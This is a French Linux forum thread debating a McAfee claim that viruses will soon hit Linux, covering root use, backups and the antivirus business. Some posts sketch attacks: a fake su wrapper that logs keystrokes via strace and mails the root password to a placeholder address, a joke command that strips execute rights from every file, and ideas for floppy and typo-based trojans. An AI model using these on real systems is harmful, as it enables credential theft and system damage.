Vnunet a prédit que dans le courant de l'année prochaine, les virus allaient faire leurs premières apparitions sur Linux. En effet, grâce à son essor actuel et à venir, Linux serait un "OS stable mais pas sécurisé" (
"It is a stable OS, but it's not a secure OS.") et donc un "marché" potentiel pour les créateurs de virus. Et M. Jack Clarke, ("European product manager" chez McAfee) de rencherir: "En fait, c'est probablement plus simple d'écrire un virus pour Linux car c'est open source et le code est disponible" (
"In fact it's probably easier to write a virus for Linux because it's open source and the code is available.").
Les virus actuels auraient leur efficacité renforcé par leur fonction de "Social engineering". Le monsieur doit penser aux virus qui lisent le carnet d'adresses d'Outlook et envoie un mail du type "Je t'envoie le dossier urgent comme convenu".
Enfin VNUnet prédit aussi une recrudescence des virus de type Code Red et Nimba sans préciser sur quelle plateforme cela risque de se produire ;).
Quelqu'un se dévoue pour leur expliquer?
(Cet article est aussi paru chez IT-director.com qui semble être le portail des décideurs pressés dans le domaine IT.)
Aller plus loin
# ...
Posté par Anonyme . Évalué à 10.
Tant qu'aucun lecteur de courriel n'execute de scripts contenus dans un courriel, il n'y a aucun risque.
J'espère que lorsque ça sera possible, les auteurs de tels logiciels auront pensé à les lancer sans aucun droit d'écriture etc...
[^] # Re: ...
Posté par VACHOR (site web personnel) . Évalué à 10.
Oui mais les bufferoverflows ca existe, donc c'est pas gagné.
Faudrait peut-être créer un répertoire "garbage" pour l'exécution des scripts, et chrooter vers garbage tous les processus qui essaient d'exécuter les scripts en question ?
[^] # Re: ...
Posté par kalahann . Évalué à 3.
s'il faut un environnement root même minimaliste pour chaque processus de ce genre, et pour chaque utilisateur, bonjour le gaspillage de disque et de mémoire!
[^] # Re: ...
Posté par Gaël Le Mignot . Évalué à 0.
ln -s ne peut pas être utilisé, mais ln tout court si, donc les binaires et libs de l'environement chrooté n'ont pas besoin d'être dupliqués
[^] # Bêtise à éviter
Posté par François Désarménien . Évalué à 4.
l'espace chrooté : si le script accède aux
droits root, il peut te modifier le contenu
de ton système (ie la libc).
Bref, *très* mauvaise idée. Je vote contre.
[^] # Re: ...
Posté par f l . Évalué à 10.
http://www.roaringpenguin.com/mimedefang/anti-virus.html(...)
Il donne aussi son analyse de la situation, en gros il soutient que les éditeurs d'anti virus soutiennent la parano pour entretenir leur business, et qu'ils feraient presque tout pour que les virus ne disparaissent pas. Leur objectif ce n'est pas la sécurité de leurs clients mais bien la maximisation de leur chiffre d'affaire.
Il lance aussi un challenge: celui qui reussira a contaminer son linux avec un virus venu par email gagne un prix de plusieurs milliers de $.
[^] # Re: ...
Posté par spim . Évalué à 3.
Le probleme ce que c'est nous qui en faisons les frais :/
[^] # Re : une question d'education
Posté par jcs (site web personnel) . Évalué à 10.
Avant d'installer des anti-virus, il faut commencer par eduquer le personnel sur des questions de securite : mots de passe, execution de programmes...
[^] # Re: Re : une question d'education
Posté par Eddy . Évalué à 10.
Je connais plein de gens dont le mot de passe est leur prenom, quand leur login est leur nom de famille.
Et quand je leur dit :"Tu ne devrais pas", la reponse est souvent
"Oui, mais j'y connais rien en info, les informaticiens sont la pour ca."
Alors leur expliquer qu'il faut descativer les fonctions automatiques...
KMail te demande systematiquement si tu veux ouvrir le fichier attache, et te previens que cela risque d'affecter la securite. Cela doit etre desactivable, mais par defaut, je l'ai laisse sur tous les comptes des machines que j'ai installees ( celui de ma copine et celui de mes parents). Et ben a chaque fois qu'ils ont une piece attachee, ils me disent
"C'est chiant ce message, Outlook ne fait pas ce genre de truc, c'est nul ton Linux, il est moins sur que Windows."
Alors que veux tu leur repondre?
[^] # Re: Re : une question d'education
Posté par Wei Long . Évalué à 10.
C'est vrai que dans les grosses boîtes l'utilisation d'un poste informatique ne fait en général pas l'objet d'une formation, c'est souvent considéré comme un acquis.
Vu les risques encourus par ces mêmes entreprises en cas de propagation de virus et les sommes mises en jeu, je pense qu'une petite formation d'une demi-journée à la sécurité des données et les risques /fonctionnement des virus ne serait pas un mal.
Une sorte de permis de conduire...
[^] # Re: Re : une question d'education
Posté par Jean-Yves B. . Évalué à 5.
[^] # Re: Re : une question d'education
Posté par Tame . Évalué à 1.
-1, c'est mechant :)
[^] # Re: Re : une question d'education
Posté par Anonyme . Évalué à 10.
- on propose un logiciel qui fait tout à la place de l'utilisateur
- on lui fout tout sur le dos en cas de pépin.
GNU/Linux permet largement d'executer des binaires sans danger (quel simple utilisateur de GNU/linux peut bousiller un système entier, considérant que les failles sont patchées ?), autant prévoir un système de ce genre.
C'est d'ailleurs bien plus puissant de disposer d'un environnement permettant d'executer des conneries reçues que de tout mettre à la poubelle.
[^] # Re: Re : une question d'education
Posté par VERMEEREN Sebastien . Évalué à 10.
[^] # Re: Re : une question d'education
Posté par Philippe F (site web personnel) . Évalué à 2.
En fait, c'est vrai soit dans un environnement avec un admin systeme (competent), doit pour un utilisateur avance.
Le newbie ne fera pas plus de backup sous windows que sous linux, et un plus, il a 80% de chance de faire tourner son linux en root. :-((((
Enquete sur une 10aine de personnes plutot newbie utilisant linux : tous en root! -> "ben ouai, sinon, le son marche pas, quake marche pas, t'as pas acces a certains trucs, c'est chiant."
On a du boulot d'education a faire!
# Pour atrapper un virus "classique"
Posté par ogallos . Évalué à 10.
Sinon, moi, de toute façon, je n'installe aucun logiciel inconnu doont les sources ne sont pas fournis (cf Planete Linux)
[^] # Re: Pour atrapper un virus "classique"
Posté par Aurélien Jarno (site web personnel) . Évalué à 10.
Et pour le compte root, détrompe toi, il y a beaucoup de personnes venant du monde Windows qui ne comprennent pas pourquoi il faut un mot de passe, donc ils en choisissent un facile (par exemple prénom ou date de naissance), et ils comprennent encore moins pourquoi il faut utiliser plusieurs comptes : sous un login utilisateur je peux pas tout faire, alors j'utilise le compte root !
Et comme de plus en plus de personnes utilisent Linux (ce qui est une bonne chose), il y aura de plus en plus d' "utilisateurs lambda" !
[^] # Re: Pour atrapper un virus "classique"
Posté par Pol . Évalué à 10.
C'est pas pour faire l'avocat du diable, mais combien de sources de tes applicatifs as-tu audité ?
c'est pas tout d'avoir les sources ... je connais les arguments classiques " la communauté du libre, bla bla bla, les progs open source plus sûrs, blablabla ...". Encore faudrait-il se donner la peine de tester la sécurité. Les rapports de bugs permettent un cycle de mises à jour/corrections plus court, mais ils ne concernent que les aspects 'visibles' (interface, erreur applicative, etc...) . Pour trouver des bugs de sécurité c'est une autre paire de manche. Les buffer overflows, ou les races sur création de fichiers ne sont souvent pas 'visibles' (pas de plantages) et pour les trouver, il faut les chercher dans le code, et ça, ça prend du temps, et ça demande une grande compétence.
Ce que je veux dire par là, c'est qu'il ne faut pas surestimer les vertus du 'libre'. C'est un modèle qui permet une meilleure sécurité, mais il ne garantit pas cette sécurité intrinsèquement.
A mon avis, mieux vaux encore faire confiance à un packager (Debian, Red Hat, ou autre suivant les goût), et mettre à jour quand un update de sécurité paraît.
[^] # Re: Pour atrapper un virus "classique"
Posté par manx . Évalué à 3.
Et encore, combien de personnes sont capable d'étudier le source pour y deceller une fonction malveillante ?
Etudier le source n'est possible que si tu es programmeur et encore faudrait t'il que le programme soit écrit dans un langage que tu connaisses. Et combien de temps faut t'il ?
Je suis daccord que pour les scripts c'est assez facilement fesable (mais pas pour le simple utilisateur, j'entend par la qui ne programme pas)La seulle solution est de faire confiance uniquements aux paquets officiels des distribs ou du mainteneur (comme tu le precises).
[^] # Re: Pour atrapper un virus "classique"
Posté par Franck Yvonnet . Évalué à 3.
[^] # Re: Pour atrapper un virus "classique"
Posté par Benoît Sibaud (site web personnel) . Évalué à 5.
Qu'est-ce qui te dit que ta nappe IDE/SCSI/USB/Obiwan Kenobi transmet les données du lecteur CD ?
Qu'est-ce qui te dit que le processeur traite les données de la nappe ?
Qu'est-ce qui te dit que la mémoire stocke bien les données du processeur ?
Qu'est-ce qui te dit que ton clavier transmet fidèlement tes commandes ?
Qu'est-ce qui te dit que ta carte graphique/ton écran transmet fidèlement ce qui se passe ?
Qu'est-ce qui te dit que l'air ne modifie pas ce qui est affiché à l'écran ?
Qu'est-ce qui te dit que tes lunettes ne modifient pas ce qui est transmis par l'air ?
Qu'est-ce qui te dit que tes yeux voient ce qui est transmis par tes lunettes ?
Qu'est-ce qui te dit que ton cerveau interprète bien ce qui est transmis par tes yeux ?
Qu'est-ce qui te dit que tu as confiance en toi ?
Qu'est-ce qui te dit que la vérité est ailleurs ?
Qu'est-ce qui te dit que je ne suis pas un chien sur Internet, qui te ment en plus ?
Ai-je des amis ? Oui même les paranos ont des amis, enfin des futur ennemis, bon des ennemis, d'ailleurs je me méfie de toi avec tes questions bizarres...
[^] # Re: Pour atrapper un virus "classique"
Posté par Johann Deneux . Évalué à 6.
Je suis persuade que peu font ca, meme parmi les linux-wise-users qui ont compris qu'il valait mieux eviter le compte root.
[^] # Re: Pour atrapper un virus "classique"
Posté par Frédéric RISS . Évalué à 1.
[^] # Re: Pour atrapper un virus "classique"
Posté par bad sheep (site web personnel) . Évalué à 3.
mes données sont sauvegardées tous les deux jours sur une partition auquel SEUL root a accès (je sais, ce serait mieux encore sur un autre dur ou une tape :), donc même si je me choppais un virus, je ne perdrai presque rien, à part le temps nécessaire pour faire un «tar xzf»... C'est quand même plus rapide que d'installer NT non ?
[^] # Re: Pour atrapper un virus "classique"
Posté par pasBill pasGates . Évalué à -2.
[^] # Re: Pour atrapper un virus "classique"
Posté par François Désarménien . Évalué à 0.
et hop, -1
# Avis perso
Posté par matiasf . Évalué à -10.
En première page je veux des infos importantes/intéressantes et pas http:://www.poubelle.com/ .
[^] # Re: Avis perso
Posté par Raphael . Évalué à 5.
Par contre, si un modéro pouvait corriger le titre, ce serait cool. Pour l'instant je le traduis par "Linux est-il enfin pas loin pour les virus" :o)
[^] # Re: Avis perso
Posté par Raphael . Évalué à 0.
[^] # Re: Avis perso
Posté par skimmy . Évalué à 10.
C'est faire de la porpagande que de cacher l'avis des "opposants".
Pour avoir l'esprit clair sur ce que nous soutenons (logiciels libres et Linux), il est important de pouvoir les comparer et de savoir comment ils sont percus, meme si ladite perception est errone. C'est justement la qu'il est necessaire de corriger les erreurs.
Puis c'est deja une reconnaissance.
Qd ils verront que Linux est deja bien plus securiser que les produits avec lesquelles McAffe travail, les consommateurs abuses des virus voudront sans doute se retourner.
ce qui m'eccoeur dans l'article c'est l'aspect commerciale.
Les antivirus sont maintenant monnaie commune sur les produits de redmond, et Mc Affe veut en mettre encore ailleurs pour etendre sont marche, quit a decredibiliser Linux.
Mickael
[^] # Re: Avis perso
Posté par matiasf . Évalué à 2.
Qui parle de propagande !?
OK. Il est important de connaitre les "armes" qu'utilisent microsoft (par exemple) contre Linux. Mais là c'est un article à la con. C'est un truc pour vendre du "papier".
Des articles dans ce style, il y en aura toujours... Et le mieux est de les ignorer. Leur but étant uniquement de ce faire de la pub (C'est comme AutoPlus qui fait sa crise car le Mégane ou la 607 ne tient pas la route et que l'on met sa vie en jeu à leur volant). On fait dans le scandale. C'est de la pub... pour le site web. Pour que les gens en causent, pour faire plein de hits qui feront bien devant les actionnaires...
C'est mon avis qui n'est pas partagé.
# Mod==radotage
Posté par Annah C. Hue (site web personnel) . Évalué à 10.
En ce qui concerne les vers, ce n'est sûrement pas un antivirus qui va faire grand chose. Pour lutter contre eux, une seule solution : se tenir au courant des vulnérabilités concernant les logiciels utilisés.
# l'Orthographe !!!
Posté par Olivier . Évalué à 1.
Hop, -1 (c)(tm)
# Linux est un systeme secure !
Posté par Arnaud de bermingham . Évalué à 10.
Ce n'est pas parceque les sources sont disponibles et ouvertes a tous que la securite du systeme est compromise, bien au contraire, l'ouverture des sources permet un tracage des sources et la verification des sources par multiples developpeurs.
"It is a stable OS, but it's not a secure OS."
Faux ! GNU/Linux est certes un systeme stable, mais aussi securise ! C'est comme tout OS, ce sont les applications installes dessus qui representent des problemes de securite, comme telnet, rsh ... tout bons administrateurs qui sait configurer et adapter le niveau de securite a ses besoins n'aura jamais de problemes de securite. Ceci est valable autant pour Windows que pour Linux ...
"In fact it's probably easier to write a virus for Linux because it's open source and the code is available. "
Il existe deja depuis un moment les root-kits sur les Unix-likes, mais bon, il faut que le systeme ait ete compromis avant de pouvoir en installer un. Les sous disant "virus" ne pourront atteindre les systemes GNU/Linux que si l'administrateur est peu vigilent et execute des programmes qui ne sont pas dignes de confiance.
On parle encore de Linux, donc le kernel, la ... chapeau a celui qui developpera un virus pour le kernel. A mon avis ce sont plus les applications qui seraient victimes d'erreures de codes qui pourraient etre la proie des virus.
Generalement les admins de systemes GNU/Linux consultent regulierement les annonces sur les problemes de securite, le virus n'aurait pas le temps de se propager vus la vitesse a laquelle les patchs logiciels sont developpes.
La c'est pas un article a propos de la securite de GNU/Linux, c'est plutot un article d'un commercial de McAfee; qui veut sans doutes developper un anti-virus pour Linux et qui doit donc se justifier ...
[^] # Re: Linux est un systeme secure !
Posté par GP Le (site web personnel) . Évalué à 10.
En Bref, Linux n'est pas secure dans l'absolu. Mais il reste largement au dessus de nombres de ses concurrent.
Quant a l'anti-virus, dans certaines boites, il est ecrit noir sur balnc que la DSI ne peut faire entrer de nouveaux materiel que si il dispose d'anti-virus. Alors autant des anti-virus existe sous linux. Ne serait ce que pour tester les partoche exporte en samba ;)
[^] # Re: Linux est un systeme secure !
Posté par kalahann . Évalué à 10.
ce sont les applications installes dessus qui representent des problemes de securite
Exact. La preuve, porte outlook sous linux et les virus vbs marcheront sous nunux! Evidemment la structure du système fera que seuls les fichiers utilisateurs seront effacés, mais bon...
On peut parler aussi des troyens. Là aussi même si l'espansion est limitée à cause des droits, ça fait toujours ch*er de perdre ses fichiers...
Il y a déjà eu des virus pour linux (1 ou 2... pas énorme :)) mais ils exploitaient un trou de sécurité d'une verion bien précise du noyau. Autant dire qu'un tel virus n'a que peu de chances de se propager d'une machine à l'autre...
Par contre, on peut imaginer un *vrai* virus qui s'installe sur disquette. Quand t'allumes ton pc avec la disquette à l'intérieur, il s'exécute furtivement, monte la partition root, installe un root-kit et enfin affiche un msg d'erreur standard (disque non bootable...) et dès que t'utilise une autre disquette il se met dessus. Le virus d'un méga... subtil, discret !
Ca pourrait marcher mais encore une fois, la difficulté de propagation est mortelle. Linux n'est vraiment pas un ecosystème viable pour les virus, ils se reproduisent trop difficilement.
De toute façon, l'avenir de la sécurité n'est pas dans l'OS même mais plutôt dans les applications. L'OS doit: Assurer sa propre sécurité, et fournir l'infrastructure qui permet d'authentifier, de crypter, de gérer les utilisateurs et les droits... Mais il ne peut faire des miracles.
[^] # Re: Linux est un systeme secure !
Posté par #3588 . Évalué à 6.
Mais c'est beaucoup ! A mon boulot, on est sous Solaris et le probleme est le meme. Mais chaque jour, automatiquement, les comptes utilisateurs sont sauvegardés. Et chaque espace de sauvegarde n'est bien sur pas accessible en écriture par les utilisateurs. Limiter les éventuels virus aux comptes utilisateur, ca devient très efficace si on gère bien les sauvegardes. Personnellement mes vidéos, mp3 et autres données qu'il n'est pas utile de modifier ne sont pas au nom de mon compte principal, je trouve que c'est une toute petite contrainte qui peut etre très utile en cas de mauvaise manipulation.
[^] # Re: Linux est un systeme secure !
Posté par VERMEEREN Sebastien . Évalué à 4.
[^] # Re: Linux est un systeme secure !
Posté par Jean-Pierre Schwickerath (site web personnel) . Évalué à 3.
Alors une install par défaut de distribution XY à mes yeux, c'est peut-être plus sûr qu'un windows moyennement sécurisé, mais si tu n'y fait rien, ta machine est ouverte comme un portail.
La sécurité n'existe que si l'on s'en soucie...
La première fois que je l'ai remarqué c'était il y a déjà quelque temps, quand les connexions ADSL sont apparues, un membre de la liste 'léa' avait expliqué comment sa machine en n'ayant eu l'ADSL que depuis quelques jours avait été transformée en host de DDOS et envoyait des packets comme fou sur le net. Au premier coup j'ai eu peur et puis on a constaté qu'il avait utilisé une RedHat 6.2 standard, sans firewall et rien, alors c'est invitant...
[^] # Re: Linux est un systeme secure !
Posté par supertutux . Évalué à 1.
--
chmod -x `find / -type f` en root fait trop secure
# open source et virus
Posté par Rin Jin (site web personnel) . Évalué à 6.
Il n'ont pas réfléchi au fait que linux étant open source il était également plus rapide de trouver les failles du systémes?
Qu'il puisse y avoir des virus sous Linux, à la rigeur, mais il faudrait pour être vraiment méchant qu'il ai accés au compte root, et les failles de sécurité permettant cela peuvent être rapidement bouché sur la plupart des programmes, sinon sur tous, justement parce que Linux est open source.
# Par ici la monnaie !
Posté par Manu . Évalué à 10.
et donc cela représente un marché potentiel...donc de l'argent et des benef pour les actionnaires....
Mais il ne savent pas même pas comment ca marche !
De toute facon il arriveront bien à fabriquer un virus eux-mêmes pour vendre quelques anti-virus Linux aux 2 - 3 boites qui auront installer une distrib par hasard et qui ne savent pas comment ca marche.
[^] # Re: Par ici la monnaie !
Posté par Pierre Jarillon (site web personnel) . Évalué à 10.
Pour MacAfee et Norton, c'est une menace importante.
N'oublions pas que les premiers virus ont été créés sous Unix. Aussitôt, on a fait en sorte que les virus ne puissent ni pénétrer, ni se répliquer. Ce fut leur fin pour tous les Unix.
Cette mesure s'appelle PREVENTIVE.
Dans le cas de Microsoft, les trous de sécurité ont été présentés comme étant des fonctionnalités. Les virus ont proliféré. Alors on a fait et vendu des anti-virus.
Cette mesure s'appelle CURATIVE... et lucrative !
J'ai commis un petit article à ce sujet sur http://pjarillon.free.fr/redac/virus.html(...)
Je pense que les anti-virus pour Linux doivent fonctionner selon le même principe que le défragmenteur de Sébastien Blondeel (sbi) :
#!/bin/sh
echo "Defragmenting all hard drives"
for pourcent in `yes | head -100 | cat -n | sed 's/y//'`
do
echo "... $pourcent% completed"
sleep 5
done
echo "Now your system is nice and clean and ready to run faster!"
Ce défragmenteur a un autre mérite, il est gratuit.
[^] # Re: Par ici la monnaie !
Posté par VERMEEREN Sebastien . Évalué à -2.
# Tiens, ca change...
Posté par Eddy . Évalué à 10.
Leur business, c'est de vendre sous Windows, et de s'arranger pour que les gtens fassent n'importe quoi avec leur ordinateur pour etre obliges de racheter la version n+1 tous les 6 mois.
Microsoft vient de sortir son nouvel OS ==> les gens vont etre obliges de racheter McAffe et consorts.
Linux prend une place de plus en plus grande ==> les antivirus ( tels qu'on les connait actuellement) vont devenirs caducs ==> il faut faire croire aux gens que les virus sous Linux ca existe et qu'il faut donc acheter McAfee (et consorts) pour Linux.
Et ils profitent de la naivete/meconaissance des gens sur ce qu'est/doit etre l'informatique pour leur faire peur.
Je pense que c'est ce genre d'annonces ( les virus son dangereux sous Linux) qui sont les meilleurs indicateurs que Linux est en train de prendre une part de plus en plus grande dans la tete des gens. Bien plus que les analyses de ITC ou du Gartner Group ou les FUD de Microsoft.
# Section Humour
Posté par Huzi . Évalué à 3.
<troll potentiel>Soyons sérieux : Les virus (au sens windows) n'existent et n'existeront pas pour `nux.</toll potentiel>
Peut-être qu'à force d'y croire, on commencera à en voir ... un peu comme pour les ovnis, les éléphants roses etc..
allez zou -1
# AVP l antivirus linux pour virus windows
Posté par Stephane Salettes . Évalué à 7.
Le but, enlever,les virus contenus dans les mails pour que l'utilisateur (windows) final ne le reçoive pas dans son outlook ou autre messagerie windows.
je pense que c est le seul antivirus qu il est interressant d installer sur un serveur linux.
Les autres (pour ma part, c'est du pipi de chat), car les virus sous linux j en ai jamais reçu !!!
[^] # Re: AVP l antivirus linux pour virus windows
Posté par freePK . Évalué à 8.
Moi, si, regulierement. Il se cache sous des .doc, .xls, .mp3, etc. Quand on fait un 'file' dessus, cela renvoie irremediablement un 'Windows 32 bits executable'...
Question a deux balles ; du temps de MS-DOS (desole, c'est ma derniere reference non-libre), les virus etaient ecrits en assembleur et faisaient a peine quelque kilo-octets. J'ai en recu un l'autre jour de 64 ko, en windows-machin. On aurait dit qu'il y avait une gui dedans ! Les developpeurs de virus utiliseraient donc VB ?
Tout se perd...
PK, presque nostalgique
[^] # Re: AVP l antivirus linux pour virus windows
Posté par DPhil (site web personnel) . Évalué à -2.
[^] # Re: AVP l antivirus linux pour virus windows
Posté par Nicolas Dubois . Évalué à 1.
Ca filtre les mail pour virer les vbs ou scanner les .doc.
Ca scanne les fichiers d'un fileserver samba ou autre....
J'en connais pas de spécifique pour Linux... D'ailleur, à part des rootKit comme t0rn qui exploitent des failles je chrche toujours le super virus qui fasse peter mes serveurs en moins que ca !!!
# Encore des rumeurs
Posté par koopa . Évalué à 4.
Donc il faut qu'un développeur super-costaud écrive un programme-virus qui essayera de devenir root.
Et là une fois qu'il est devenu root il sacagerait tout le contenu de la machine ? Non ! il est bien plus intéressant pour lui de conserver la machine en l'état puisqu'il en a acquis le contrôle absolu.
Alors, des vers, des chevaux de Troie sont sûremment intéressants, mais des virus, beaucoup moins.
[^] # Re: Encore des rumeurs
Posté par kalahann . Évalué à 3.
[^] # Re: Encore des rumeurs
Posté par Romuald Delavergne . Évalué à 5.
"/usr" je m'en fou un peu car je peu toujours le réinstaller. Par contre mes données personnelles...
# virus et utilisateur
Posté par gui_ . Évalué à 10.
Je connais des utilisateurs de windows qui n'ont quasiment aucun problème avec les virus car ils ne font pas n'importe quoi. Un système comme GNU/Linux est principalement utilisé par des gens ayant des compétence en informatique. Mais si GNU/Linux devient grand public il sera autant exposé que Windows.
J'en ai marre de cette hipocrisie qui est de toujours dire GNU/Linux est le plus stable le plus secure etc. Une fois que vous méttez un utilisateur devant le système est qu'une application segfault, il ne comprend pas.
GNU/Linux est un très bon système d'exploitation qui a de nombreux avantages (dont un des principaux est quand même la liberté), mais il faut le présenter d'une manière objective et informer les utilisateurs que le système ne fera jamais tout pour eux, et que c'est à eux de s'informer et d'utiliser leur système de façon intélligente.
[^] # Re: virus et utilisateur
Posté par kalahann . Évalué à 2.
[^] # Re: virus et utilisateur
Posté par Gauthier Monserand (site web personnel) . Évalué à 4.
[^] # Re: virus et utilisateur
Posté par kalahann . Évalué à 1.
Admettons que tu fasses ton wrapper. Comment le fais-tu exécuter par root? Tu remplaces su, tu te débrouilles pour qu'il soit avant le répertoire de su dans le $PATH de root? OK, mais pour faire ça, faut DEJA avoir les droits root... C le pb de l'oeuf et de la poule.
Sérieusement, si c'était aussi facile de pirater un système ça se saurait.
[^] # Re: virus et utilisateur
Posté par Thomas Pedoussaut . Évalué à 1.
un wrapper de su pour le luser lambda.
Il change l'ordre de PATH et au prochain su que fait le luser, hop il peut continuer l'infection.
Et là effectivement ca pourrait fonctionner
[^] # Re: virus et utilisateur
Posté par kalahann . Évalué à 1.
Par contre, le truc qui peut marcher, c'est le coup de la faute de frappe. Je sais pas si vous avez remarqué mais on fait souvent les mêmes fautes (moi j'échange souvent a et e, i et o, s et x...)
Si vous avez les droits d'écriture dans un répertoire contenu dans le $PATH d'un utilisateur (mais bon ça n'existe pas logiquement, c'est trop dangereux!) vous pouvez faire un wrapper de ce type du genre /usr/local/xu. Là du coup, quand l'utilisateur fait sa faute et tape xu au lieu de su, votre script est exécuté.
Et je peux vous dire que ce genre de trucs marche plutôt bien! comme je l'ai dit on fait souvent les mêmes fautes de frappe (dislexie suxx :)
[^] # Re: virus et utilisateur
Posté par Gauthier Monserand (site web personnel) . Évalué à 5.
$cat /tmp/monsu
strace -o log1 /bin/su
cat log1 | grep "read(0" | mail qqn@qqpart
unalias su
en tres gros c'est ca
[^] # Re: virus et utilisateur
Posté par Gauthier Monserand (site web personnel) . Évalué à -2.
--
void *
[^] # Re: virus et utilisateur
Posté par kalahann . Évalué à 1.
[^] # Re: virus et utilisateur
Posté par pasBill pasGates . Évalué à 0.
- Je m'introduis sur la machine avec les droits de l'user X a travers son soft de mail ou xyz, peu importe, je me retrouve donc avec les droits de l'utilisateur, pas ceux de root.
- Je mets un wrapper de su dans le path de l'utilisateur, ce wrapper affiche a la place de su le "password:", recoit le mot de passe et hop, passe en root grace a ca et fait ce que je veux sur la machine.
- Un jour l'utilisateur veut faire un truc en tant que root, il tape su, et la mon wrapper qui se trouve avant le vrai su dans le path de l'user se lance, et imite su, il demande le mot de passe root, l'user se doute de rien et hop il donne le mot de passe root au virus, ensuite ben c'est fini, le virus fait le su lui-meme et fait ce qu'il veut de la machine.
[^] # Re: virus et utilisateur
Posté par gui_ . Évalué à 2.
Le système a beau être bien conçu, les utilisateurs sont toujours trop fainéant et/ou mal informé et ça, les meilleurs techniques de sécurité et la meilleur conception n'y changeront rien. Unix est extrément sécurisé lorsqu'il y a un admin compétant et des utilisateurs avec des droits très limités. Mais GNU/Linux est avant tout utilisé par des utilisateurs seul, qui n'ont pas forcément de culture Unix (et ce de plus en plus).
C'est pourquoi je pense que GNU/Linux n'est malheuresement pas beaucoup plus protégé que windows des virus pour un pc domestique. Cependant GNU/Linux en tant que serveur l'est plus (les administrateurs de serveur sont sensé être des gens compétant). Là, le danger vient plus des failles du système que de celles de l'utilisateur (mais on a quand même déjà vu des site internet utilisant GNU/Linux et apache piratés à cause d'une erreur de configuration ou d'une mise à jour qui n'avait pas été faites).
[^] # Re: virus et utilisateur
Posté par Jean-Marc Chapuzot . Évalué à 0.
[^] # Re: virus et utilisateur
Posté par kalahann . Évalué à 3.
[^] # Re: virus et utilisateur
Posté par Obsidian . Évalué à 3.
[^] # Re: virus et utilisateur
Posté par pasBill pasGates . Évalué à -3.
Le probleme est IDENTIQUE au niveau OS.
[^] # Re: virus et utilisateur
Posté par Eddy . Évalué à 2.
Voila mon/ma explication/demonstration.
Soit mon ordinateur tournant sous Win2000 et un logiciel de messagerie fourni obligeamment par le systeme, mettons Outlook.
Soit un vilain mechant pirate qui fait un virus qui se transmet par mail.
Je recois ce virus. Il infecte mes fichiers, eventuellement, il en detruit qq uns, puis va voir mon carnet d'adresses, et se transmet a ces personnes. Il arrive sur leur ordinateur. Et detruit LEURS fichiers.
Voila, un virus etant sur MA machine a infecte et detruit des fichiers sur une AUTRE machine.
Je sais, c'est nul comme demonstration. Mais ce que tu disais aussi.
[^] # Re: virus et utilisateur
Posté par pasBill pasGates . Évalué à -3.
Sans compter que rien ne te dit qu'il a infecte les gens de ton address book, il s'est juste envoye a eux, ils n'ont peut-etre pas Windows, peut-etre pas Outlook, peut-etre qu'ils ont configure Outlook correctement, qu'ils savent ce qu'ils font et qu'ils ne lancent pas les attachements, etc...
En gros, rien ne dit que tu as infecte tes contacts.
La proposition tient toujours, celui qui me montre que Win2000 est plus vulnerable que Linux a ce type d'attaque je lui paie une biere(non pas une budweiser, j'ai du gout quand meme).
[^] # Re: virus et utilisateur
Posté par Eddy . Évalué à 2.
Mais si tu sais qu'il utilise le meme systeme d'exploitation et le meme logiciel de messagerie, alors tu peux etre raisonnablement sur que ce virus a produit les memes effets.
Donc si ca a detruit 1/2 de tes fichiers, alors ca a detruit 1/2 des fichiers chez les recipiendaires.
Peut-etre que Win2000 en lui meme n'est pas plus vunerable, mais si la vulnerabilite d'un OS est divisee par 1000 lors de l'ajout d'un logiciel, alors, on peut dire que l'OS ne sait pas quoi faire.
Sous Linux, si tu rajoute une connection vers le monde exterieur alors ton systeme est moins sur. Mais tu peux rajouter des cliens de messagerie, tu ne fera pas prendre des risques inconsideres a 90% des utilisateurs dans le monde.
[^] # Re: virus et utilisateur
Posté par pasBill pasGates . Évalué à -3.
Resultat d'une machine Linux tu as infecte 90% des utilisateurs dans le monde car tu es le point de depart.
D'autre part, le jour ou Linux sera sur 90% des machines de la planete, si ca arrive un jour, ben le probleme tu l'auras sans meme besoin d'envoyer un VBS depuis le Linux, juste en utilisant la meme attaque que j'aurais utilise contre ta machine. Ce n'est donc pas inherent a l'OS.
[^] # Re: virus et utilisateur
Posté par kalahann . Évalué à 1.
[^] # Re: virus et utilisateur
Posté par pasBill pasGates . Évalué à -2.
# virus en gpl
Posté par johann berchet . Évalué à 4.
-Si oui alors ce sera encore plus facile pour les virus
Message à tout ceux qui font des virus:
Soyez sympa et passez vos virus linux en GPL (vous filez les sources avec vos virus) comme ça ça feras avancer linux
Du coup si tout le monde file les sources de virus et antivirus ça sert plus a rien d'en faire donc...
Voila c'etait juste une reflexion
Desolé
(un virus en GPL c'est plus un virus)
[^] # Re: virus en gpl
Posté par Obsidian . Évalué à 2.
pense que cela serait tout à fait possible.
De même qu'un virus compilé n'a jamais empêché les experts de la chose de deviner son fonctionnement, filer les sources de son dernier bébé ne l'empêchera jamais de se propager !
Et d'autre part, d'un point de vue strictement juridique:
1) Il n'est pas interdit de copier le virus puisqu'il le fait lui-même
2) L'auteur est anonyme et ne fais jamais afficher un contrat de licence type "Cliquer sur Accepter pour exécuter le virus". Donc, le virus est dans le domaine public.
Il se pourrait tout à fait qu'un allumé (pas forcément très allumé d'ailleurs) dont on ne prendrait pas assez au sérieux ses alertes au trou de sécurité fasse la démonstration par l'exemple en lançant un programme avec le source et les prévisions, et laisse ensuite le monde devant le fait accompli.
Ca me rappelle le Virus Corse, archétype même du Social Enginering, à envoyer par mail à tous vos amis (Attention extremement puissant: Même pas besoin de cliquer pour que le virus agisse):
--------------------------------------------
Vous venez de recevoir le Virus Corse.
Comme nous autres Corses n'avons pas d'expérience
dans le domaine de la programmation, ce virus
fonctionne sur le principe de l'HONNEUR.
Vous êtes donc prié de faire suivre ce message à
tous les contacts de votre carnet d'adresse et
d'effacer manuellement les fichiers de votre
disque dur.
Merci de votre coopération.
---------------------------------------------
A prononcer de préférence avec l'accent :-)
[^] # Re: virus en gpl
Posté par Franck Yvonnet . Évalué à 3.
[^] # Re: virus en gpl
Posté par benja . Évalué à 2.
Faux !
La nature même d'un virus c'est d'être dépendant, c'est un parasite.
Il n'existe pas de virus indépendant, soit il exploite un mauvais réflex de l'utilisateur, soit il exploite une faille d'un programme.
# Cachez ces sources, pour la securité ?
Posté par Egidius . Évalué à 5.
Si cacher les sources etait un facteur de sécurité, on le saurait chez microsoft.
Pour sécuriser leur site, toujours chez crosoft, il y a une arméee d'administrateurs + de 100 qui veillent et interviennent au moindre problème.
La sécurité a toujours un prix, c'est cher.
En temps ou en argent.
[^] # Re: Cachez ces sources, pour la securité ?
